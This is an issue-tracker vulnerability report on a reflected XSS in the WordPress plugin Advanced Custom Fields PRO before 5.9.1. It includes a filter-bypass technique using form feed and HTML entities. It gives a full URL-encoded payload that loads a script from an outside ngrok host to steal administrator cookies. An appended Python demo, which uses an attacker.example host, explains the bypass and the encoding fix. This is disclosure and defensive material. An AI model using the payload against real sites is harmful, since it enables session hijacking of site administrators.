
Reflected XSS in WordPress for 'Advanced Custom Fields PRO' plugin #1

jdordonezn opened this issue Jan 20, 2021

WordPress allows reflected cross-site scripting through the admin resource edit.php, because the updates page of the Advanced Custom Fields PRO plugin (versions before 5.9.1) that it loads reflects part of the request URL into the response without adequate encoding, enabling injection of JavaScript code.

Steps to reproduce the vulnerability

  1. Append the XSS payload to the end of the URL, like so:
    https://SiteWithWordpress/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"><script>alert('XSS')</script>

  2. However, after trying some payloads, I saw that the space character is replaced in the response with an underscore [ _ ], and the same happens to the dot character [ . ], so it is not possible to inject a useful payload, for example one that extracts the session cookie.
    [Screenshot: Problem]

  3. I found a way to bypass this problem: in the request, replace the space character with [%0c] and the dot character [ . ] with its HTML-encoded equivalent. This content is rendered successfully because the response is an HTML page.
    [Screenshot: Payload]

  4. Now it is time to write the script that sends the administrator user's cookies to the attacker's server, for example:
    [Screenshot: Request_JS]

  5. Of course, the payload that calls that script must first be URL-encoded, giving:
    https://WordPressDomain/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&"XSS%22%3e%3c%73%63%72%69%70%74%0c%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%32%65%32%30%30%32%66%39%26%23%78%32%65%3b%6e%67%72%6f%6b%26%23%78%32%65%3b%69%6f%2f%72%65%71%75%65%73%74%26%23%78%32%65%3b%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e
    Decoded, the injected part is "XSS"><script[%0c]src="https://2e2002f9&#x2e;ngrok&#x2e;io/request&#x2e;js"></script>, which contains no space and no dot for the filter to rewrite.
    [Screenshot: XSS1]

  6. Send the payload and you will see two requests: the first makes a promise to send the cookies and the second is where the promise is executed.
    [Screenshot: XSS2]

  7. Now the attacker has the administrator user's cookies on the evil server.
    [Screenshot: XSS3]

Remediation

I exchanged messages with the Advanced Custom Fields dev team; they fixed the vulnerability in version 5.9.1 of ACF PRO. Here is the report:
https://www.advancedcustomfields.com/blog/acf-5-9-1-release/
https://wpscan.com/vulnerability/d1e9c995-37bd-4952-b88e-945e02e3c83f
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24241
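The following is an added example written for this page; it is not code from the report above and not ACF's code. It models the filter described in steps 2 and 3 as "every space and dot in the reflected value becomes an underscore" (an assumption standing in for whatever the plugin actually did), reflects the value into a double-quoted attribute, and runs both the plain payload and the %0c / &#x2e; payload through Python's HTML tokenizer. The point it demonstrates is why the bypass works at all: the HTML tokenizer treats form feed (U+000C, the decoded %0c) as whitespace between a tag name and its attributes, and it decodes character references such as &#x2e; inside attribute values, so the browser ends up with an intact https://.../request.js even though the server never saw a space or a dot. The last case shows the fix a reviewer would ask for: entity-encode the reflected value for the attribute context instead of rewriting selected characters. The host attacker.example, the surrounding <input> markup and all function names are assumptions.

```python
"""Added example (not the report's or ACF's code): why a space/dot-to-underscore
filter does not stop attribute-context XSS, and why attribute encoding does."""
import html
from html.parser import HTMLParser
from urllib.parse import unquote


def underscore_filter(value: str) -> str:
    """Assumed stand-in for the behaviour observed in the report: every space
    and dot in the reflected value is rewritten to '_'. Not the plugin's code."""
    return value.replace(" ", "_").replace(".", "_")


def attribute_encode(value: str) -> str:
    """The correct defence: entity-encode for the attribute context, so the
    closing quote and '<' can never leave the attribute value."""
    return html.escape(value, quote=True)


def render_reflected(value: str, sanitise) -> str:
    """Reflect `value` into a double-quoted attribute, as the vulnerable page
    does with part of the request URL (markup is a constructed stand-in)."""
    return '<input type="hidden" name="page" value="%s">' % sanitise(value)


class ScriptCollector(HTMLParser):
    """Records the src of every <script> start tag the tokenizer produces."""

    def __init__(self) -> None:
        super().__init__()
        self.script_srcs: list = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "script":
            self.script_srcs.append(dict(attrs).get("src"))


def script_sources(document: str) -> list:
    """Return the src of each <script> element the tokenizer finds.
    Like a browser, html.parser accepts form feed as whitespace before an
    attribute name and decodes &#x2e; inside the attribute value."""
    collector = ScriptCollector()
    collector.feed(document)
    collector.close()
    return collector.script_srcs


# Constructed payloads; attacker.example is a placeholder host.
PLAIN = '"><script src="https://attacker.example/request.js"></script>'
# The same payload the way step 5 sends it: URL-encoded, %0c instead of the
# space, and &#x2e; (URL-encoded as %26%23x2e%3b) instead of every dot.
BYPASS_ENCODED = (
    "%22%3e%3cscript%0csrc%3d%22https%3a%2f%2fattacker%26%23x2e%3bexample"
    "%2frequest%26%23x2e%3bjs%22%3e%3c%2fscript%3e"
)
BYPASS = unquote(BYPASS_ENCODED)  # contains \x0c and &#x2e;, no space, no dot


def demo() -> dict:
    """Run the four combinations; a non-empty list means a live <script>."""
    return {
        "plain/filter": script_sources(render_reflected(PLAIN, underscore_filter)),
        "bypass/filter": script_sources(render_reflected(BYPASS, underscore_filter)),
        "plain/encode": script_sources(render_reflected(PLAIN, attribute_encode)),
        "bypass/encode": script_sources(render_reflected(BYPASS, attribute_encode)),
    }


if __name__ == "__main__":
    for case, srcs in demo().items():
        print(f"{case:14s} -> {srcs or 'no script element'}")
```

Only the "bypass/filter" case yields a script element, with src already decoded to https://attacker.example/request.js; the underscore filter mangles the plain payload, and attribute encoding neutralises both. One caveat on step 7: WordPress sets its authentication cookies with the HttpOnly flag, so document.cookie returns only the non-HttpOnly ones; script running in the administrator's origin can still issue authenticated same-origin requests, so the impact of the XSS is not reduced by that.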
